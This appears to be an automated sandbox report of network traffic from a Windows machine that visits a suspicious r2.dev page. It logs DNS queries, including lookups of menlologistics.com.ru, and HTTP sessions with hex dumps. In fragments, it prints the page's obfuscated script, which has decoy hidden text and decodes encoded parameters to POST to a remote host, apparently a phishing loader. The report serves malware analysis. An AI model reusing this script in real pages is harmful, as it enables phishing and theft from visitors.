                                                    Jul 4, 2024 21:06:03.172158957 CEST6397653192.168.2.41.1.1.1
                                                    Jul 4, 2024 21:06:03.250080109 CEST6404053192.168.2.41.1.1.1
                                                    Jul 4, 2024 21:06:03.250408888 CEST5080653192.168.2.41.1.1.1
                                                    Jul 4, 2024 21:06:03.263780117 CEST53640401.1.1.1192.168.2.4
                                                    Jul 4, 2024 21:06:03.264045000 CEST53508061.1.1.1192.168.2.4
                                                    Jul 4, 2024 21:06:03.264600039 CEST53497081.1.1.1192.168.2.4
                                                    Jul 4, 2024 21:06:03.266141891 CEST53639761.1.1.1192.168.2.4
                                                    Jul 4, 2024 21:06:09.872529030 CEST53640411.1.1.1192.168.2.4
                                                    Jul 4, 2024 21:06:15.576055050 CEST53625821.1.1.1192.168.2.4
                                                    Jul 4, 2024 21:06:34.620901108 CEST53573771.1.1.1192.168.2.4
                                                    Jul 4, 2024 21:06:56.962629080 CEST53522891.1.1.1192.168.2.4
                                                    Jul 4, 2024 21:06:57.200464964 CEST53579461.1.1.1192.168.2.4
                                                    Jul 4, 2024 21:07:26.090370893 CEST53601201.1.1.1192.168.2.4
                                                    Jul 4, 2024 21:08:11.245994091 CEST53591961.1.1.1192.168.2.4
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Jul 4, 2024 21:05:58.548449993 CEST192.168.2.41.1.1.10xa44dStandard query (0)pub-ad8bdbb321694934a9a218eeb6868559.r2.devA (IP address)IN (0x0001)false
                                                    Jul 4, 2024 21:05:58.548644066 CEST192.168.2.41.1.1.10x31e9Standard query (0)pub-ad8bdbb321694934a9a218eeb6868559.r2.dev65IN (0x0001)false
                                                    Jul 4, 2024 21:05:59.600199938 CEST192.168.2.41.1.1.10x5098Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                    Jul 4, 2024 21:05:59.600341082 CEST192.168.2.41.1.1.10x1a86Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                    Jul 4, 2024 21:06:00.420170069 CEST192.168.2.41.1.1.10x5972Standard query (0)menlologistics.com.ruA (IP address)IN (0x0001)false
                                                    Jul 4, 2024 21:06:00.420325994 CEST192.168.2.41.1.1.10x67e8Standard query (0)menlologistics.com.ru65IN (0x0001)false
                                                    Jul 4, 2024 21:06:01.941586971 CEST192.168.2.41.1.1.10x7c3eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                    Jul 4, 2024 21:06:01.941735029 CEST192.168.2.41.1.1.10xe3eaStandard query (0)www.google.com65IN (0x0001)false
                                                    Jul 4, 2024 21:06:03.171994925 CEST192.168.2.41.1.1.10x7650Standard query (0)menlologistics.com.ruA (IP address)IN (0x0001)false
                                                    Jul 4, 2024 21:06:03.172158957 CEST192.168.2.41.1.1.10x7c91Standard query (0)menlologistics.com.ru65IN (0x0001)false
                                                    Jul 4, 2024 21:06:03.250080109 CEST192.168.2.41.1.1.10x4c6cStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                    Jul 4, 2024 21:06:03.250408888 CEST192.168.2.41.1.1.10x5d48Standard query (0)code.jquery.com65IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Jul 4, 2024 21:05:57.545981884 CEST1.1.1.1192.168.2.40x8519No error (0)g.msn.comg-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                    Jul 4, 2024 21:05:57.548556089 CEST1.1.1.1192.168.2.40xd27cNo error (0)g.msn.comg-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                    Jul 4, 2024 21:05:58.561264992 CEST1.1.1.1192.168.2.40xa44dNo error (0)pub-ad8bdbb321694934a9a218eeb6868559.r2.dev104.18.2.35A (IP address)IN (0x0001)false
                                                    Jul 4, 2024 21:05:58.561264992 CEST1.1.1.1192.168.2.40xa44dNo error (0)pub-ad8bdbb321694934a9a218eeb6868559.r2.dev104.18.3.35A (IP address)IN (0x0001)false
                                                    Jul 4, 2024 21:05:59.607589006 CEST1.1.1.1192.168.2.40x1a86No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                    Jul 4, 2024 21:05:59.607681036 CEST1.1.1.1192.168.2.40x5098No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                    Jul 4, 2024 21:05:59.607681036 CEST1.1.1.1192.168.2.40x5098No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                    Jul 4, 2024 21:06:00.520267010 CEST1.1.1.1192.168.2.40x67e8No error (0)menlologistics.com.ru65IN (0x0001)false
                                                    Jul 4, 2024 21:06:00.610150099 CEST1.1.1.1192.168.2.40x5972No error (0)menlologistics.com.ru188.114.97.3A (IP address)IN (0x0001)false
                                                    Jul 4, 2024 21:06:00.610150099 CEST1.1.1.1192.168.2.40x5972No error (0)menlologistics.com.ru188.114.96.3A (IP address)IN (0x0001)false
                                                    Jul 4, 2024 21:06:01.949749947 CEST1.1.1.1192.168.2.40xe3eaNo error (0)www.google.com65IN (0x0001)false
                                                    Jul 4, 2024 21:06:01.950961113 CEST1.1.1.1192.168.2.40x7c3eNo error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false
                                                    Jul 4, 2024 21:06:03.263780117 CEST1.1.1.1192.168.2.40x4c6cNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                    Jul 4, 2024 21:06:03.263780117 CEST1.1.1.1192.168.2.40x4c6cNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                    Jul 4, 2024 21:06:03.263780117 CEST1.1.1.1192.168.2.40x4c6cNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                    Jul 4, 2024 21:06:03.263780117 CEST1.1.1.1192.168.2.40x4c6cNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                    Jul 4, 2024 21:06:03.264600039 CEST1.1.1.1192.168.2.40x7650No error (0)menlologistics.com.ru188.114.97.3A (IP address)IN (0x0001)false
                                                    Jul 4, 2024 21:06:03.264600039 CEST1.1.1.1192.168.2.40x7650No error (0)menlologistics.com.ru188.114.96.3A (IP address)IN (0x0001)false
                                                    Jul 4, 2024 21:06:03.266141891 CEST1.1.1.1192.168.2.40x7c91No error (0)menlologistics.com.ru65IN (0x0001)false
                                                    • fs.microsoft.com
                                                    • armmf.adobe.com
                                                    • slscr.update.microsoft.com
                                                    • pub-ad8bdbb321694934a9a218eeb6868559.r2.dev
                                                    • https:
                                                      • cdnjs.cloudflare.com
                                                      • menlologistics.com.ru
                                                      • code.jquery.com
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.449738184.28.90.27443
                                                    TimestampBytes transferredDirectionData
                                                    2024-07-04 19:05:38 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    Accept-Encoding: identity
                                                    User-Agent: Microsoft BITS/7.8
                                                    Host: fs.microsoft.com
                                                    2024-07-04 19:05:38 UTC466INHTTP/1.1 200 OK
                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                    Content-Type: application/octet-stream
                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                    Server: ECAcc (chd/0758)
                                                    X-CID: 11
                                                    X-Ms-ApiVersion: Distribute 1.2
                                                    X-Ms-Region: prod-eus-z1
                                                    Cache-Control: public, max-age=43104
                                                    Date: Thu, 04 Jul 2024 19:05:38 GMT
                                                    Connection: close
                                                    X-CID: 2


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.449739184.28.90.27443
                                                    TimestampBytes transferredDirectionData
                                                    2024-07-04 19:05:39 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    Accept-Encoding: identity
                                                    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                    Range: bytes=0-2147483646
                                                    User-Agent: Microsoft BITS/7.8
                                                    Host: fs.microsoft.com
                                                    2024-07-04 19:05:40 UTC514INHTTP/1.1 200 OK
                                                    ApiVersion: Distribute 1.1
                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                    Content-Type: application/octet-stream
                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                    Server: ECAcc (lpl/EF06)
                                                    X-CID: 11
                                                    X-Ms-ApiVersion: Distribute 1.2
                                                    X-Ms-Region: prod-weu-z1
                                                    Cache-Control: public, max-age=43124
                                                    Date: Thu, 04 Jul 2024 19:05:39 GMT
                                                    Content-Length: 55
                                                    Connection: close
                                                    X-CID: 2
                                                    2024-07-04 19:05:40 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.44974223.47.168.244437288C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-07-04 19:05:45 UTC475OUTGET /onboarding/smskillreader.txt HTTP/1.1
                                                    Host: armmf.adobe.com
                                                    Connection: keep-alive
                                                    Accept-Language: en-US,en;q=0.9
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                    Sec-Fetch-Site: same-origin
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: empty
                                                    Accept-Encoding: gzip, deflate, br
                                                    If-None-Match: "78-5faa31cce96da"
                                                    If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
                                                    2024-07-04 19:05:45 UTC198INHTTP/1.1 304 Not Modified
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Last-Modified: Mon, 01 May 2023 15:02:33 GMT
                                                    ETag: "78-5faa31cce96da"
                                                    Date: Thu, 04 Jul 2024 19:05:45 GMT
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.44974440.68.123.157443
                                                    TimestampBytes transferredDirectionData
                                                    2024-07-04 19:05:46 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Hp9snZF7dKOoUty&MD=YmpwYxfF HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                    Host: slscr.update.microsoft.com
                                                    2024-07-04 19:05:47 UTC560INHTTP/1.1 200 OK
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Content-Type: application/octet-stream
                                                    Expires: -1
                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                    ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                    MS-CorrelationId: 1c4e35e4-2d10-4083-ad66-5148fc96ab02
                                                    MS-RequestId: 4fc41ec6-8a0f-4025-be76-704b47777390
                                                    MS-CV: HKeoY87W0k2Xmfnm.0
                                                    X-Microsoft-SLSClientCache: 2880
                                                    Content-Disposition: attachment; filename=environment.cab
                                                    X-Content-Type-Options: nosniff
                                                    Date: Thu, 04 Jul 2024 19:05:46 GMT
                                                    Connection: close
                                                    Content-Length: 24490
                                                    2024-07-04 19:05:47 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                    Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                    2024-07-04 19:05:47 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                    Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.449754104.18.2.354432124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-07-04 19:05:59 UTC695OUTGET /link.html HTTP/1.1
                                                    Host: pub-ad8bdbb321694934a9a218eeb6868559.r2.dev
                                                    Connection: keep-alive
                                                    Upgrade-Insecure-Requests: 1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: navigate
                                                    Sec-Fetch-User: ?1
                                                    Sec-Fetch-Dest: document
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    sec-ch-ua-platform: "Windows"
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-07-04 19:05:59 UTC282INHTTP/1.1 200 OK
                                                    Date: Thu, 04 Jul 2024 19:05:59 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 5513
                                                    Connection: close
                                                    Accept-Ranges: bytes
                                                    ETag: "a7ed94669c36345d5489425b9283985d"
                                                    Last-Modified: Thu, 04 Jul 2024 12:00:24 GMT
                                                    Server: cloudflare
                                                    CF-RAY: 89e163d28eb89e08-EWR
                                                    2024-07-04 19:05:59 UTC1087INData Raw: 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79
                                                    Data Ascii: <html> <head> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script> <style>body
                                                    2024-07-04 19:05:59 UTC1369INData Raw: 73 70 6c 61 79 3a 20 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 20 77 72 61 70 3b 77 69 64 74 68 3a 20 31 31 38 70 78 3b 68 65 69 67 68 74 3a 20 31 33 31 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 37 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 33 30 36 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 20 63 61 6c 2d 62 6f 75 6e 63 65 20 35 73 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2c 20 30 2e 35 2c 20 30 2c 20 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 35 31 70 78 29 20 73 63 61 6c 65 59 28 31 29 3b 7d 40 6b 65
                                                    Data Ascii: splay: flex;flex-wrap: wrap;width: 118px;height: 131px;border-radius: 7px;overflow: hidden;margin: 0 auto;margin-top: -306px;animation: cal-bounce 5s infinite;animation-timing-function: cubic-bezier(0, 0.5, 0, 1);transform: translateY(51px) scaleY(1);}@ke
                                                    2024-07-04 19:05:59 UTC1369INData Raw: 74 69 6f 6e 3a 20 63 6c 6f 73 65 64 2d 66 6c 61 70 2d 73 77 69 6e 67 20 35 73 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 33 32 2c 20 30 2c 20 30 2e 36 37 2c 20 30 29 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 74 6f 70 3b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 37 31 70 78 29 20 72 6f 74 61 74 65 33 64 28 31 2c 20 30 2c 20 30 2c 20 39 30 64 65 67 29 3b 7d 40 6b 65 79 66 72 61 6d 65 73 20 63 6c 6f 73 65 64 2d 66 6c 61 70 2d 73 77 69 6e 67 20 7b 30 25 2c 20 31 30 30 25 2c 20 37 37 25 2c 20 38 2e 35 25 20 7b 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 37 31 70 78 29 20 72 6f 74 61
                                                    Data Ascii: tion: closed-flap-swing 5s infinite;animation-timing-function: cubic-bezier(0.32, 0, 0.67, 0);transform-origin: top;transform: translateY(-71px) rotate3d(1, 0, 0, 90deg);}@keyframes closed-flap-swing {0%, 100%, 77%, 8.5% {transform: translateY(-71px) rota
                                                    2024-07-04 19:05:59 UTC1369INData Raw: 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 66 69 67 22 3e 3c 64 69 76 20 69 64 3d 22 73 74 72 75 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 75 73 74 6f 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0d 0a 09 3c 73 70 61 6e 20 68 69 64 64 65 6e 3e 42 75 73 69 6e 65 73 73 65 73 20 6d 61 6b 65 20 70 6f 73 69 74 69 76 65 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 74 6f 20 63 6f 6d 6d 75 6e 69 74 69 65 73 2e 3c 2f 73 70 61 6e 3e 0d 0a 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 6d 69 6e 64 66 75 6c 6e 65 73 73 28 68 65 61 6c 74 68 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 7b 61 2c 62 2c 63 2c 64 7d 20 3d 20 4a 53 4f 4e 2e 70 61 72 73 65 28
                                                    Data Ascii: </div><div id="fig"><div id="strut"><div class="gusto"></div></div></div></div><span hidden>Businesses make positive contributions to communities.</span> </body><script> async function mindfulness(health) { var {a,b,c,d} = JSON.parse(
                                                    2024-07-04 19:05:59 UTC319INData Raw: 59 54 49 35 5a 54 5a 6b 4e 54 68 6b 4e 7a 63 77 4f 54 4e 68 4e 7a 41 7a 4e 54 6b 31 4e 6d 4a 68 4f 44 6c 69 4f 44 49 7a 4f 47 51 31 5a 54 46 69 5a 57 51 78 4f 54 42 6a 49 69 77 69 5a 43 49 36 49 6a 59 7a 4e 6a 45 32 5a 54 63 30 4e 6a 45 32 59 7a 5a 6d 4e 7a 55 33 4d 44 59 31 49 6e 30 3d 60 29 29 2c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 65 74 68 6f 64 3a 20 27 50 4f 53 54 27 2c 20 62 6f 64 79 3a 20 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 7b 20 6b 65 65 6e 3a 20 22 70 61 70 61 79 61 22 20 7d 29 0d 0a 20 20 20 20 20 20 20 20 7d 29 29 2e 74 65 78 74 28 29 29 29 3b 0d 0a 20 20 20 20 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 20 3c 64 69 76 3e 4d 75 73 63 6c 65 73 20 61 72 65 20 6c 69 6b 65 20 63 61 72 73 3b 20 74 68 65
                                                    Data Ascii: YTI5ZTZkNThkNzcwOTNhNzAzNTk1NmJhODliODIzOGQ1ZTFiZWQxOTBjIiwiZCI6IjYzNjE2ZTc0NjE2YzZmNzU3MDY1In0=`)), { method: 'POST', body: JSON.stringify({ keen: "papaya" }) })).text())); })();</script>... <div>Muscles are like cars; the


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.449755104.17.25.144432124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-07-04 19:06:00 UTC589OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                    Host: cdnjs.cloudflare.com
                                                    Connection: keep-alive
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    sec-ch-ua-platform: "Windows"
                                                    Accept: */*
                                                    Sec-Fetch-Site: cross-site
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: script
                                                    Referer: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-07-04 19:06:00 UTC964INHTTP/1.1 200 OK
                                                    Date: Thu, 04 Jul 2024 19:06:00 GMT
                                                    Content-Type: application/javascript; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Access-Control-Allow-Origin: *
                                                    Cache-Control: public, max-age=30672000
                                                    ETag: W/"5eb03e2d-bb78"
                                                    Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                    cf-cdnjs-via: cfworker/kv
                                                    Cross-Origin-Resource-Policy: cross-origin
                                                    Timing-Allow-Origin: *
                                                    X-Content-Type-Options: nosniff
                                                    CF-Cache-Status: HIT
                                                    Age: 232265
                                                    Expires: Tue, 24 Jun 2025 19:06:00 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SXDyUwFu0NKZ%2FOBQooJdpEWBYWFmjdFu4QzZ2HpXJOPf0yhsK9%2BsoeXIpxNdLbVrziUl4i12D%2B6aT%2BVHSmpqPkt8OGTsqdPxGs9yD3aEiaSxDXENH1FfBBl67jGzR%2BdM%2BMoBiVfr"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                    Strict-Transport-Security: max-age=15780000
                                                    Server: cloudflare
                                                    CF-RAY: 89e163d71fc64251-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-07-04 19:06:00 UTC405INData Raw: 33 39 39 38 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                    Data Ascii: 3998!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                    2024-07-04 19:06:00 UTC1369INData Raw: 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74
                                                    Data Ascii: o&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==t
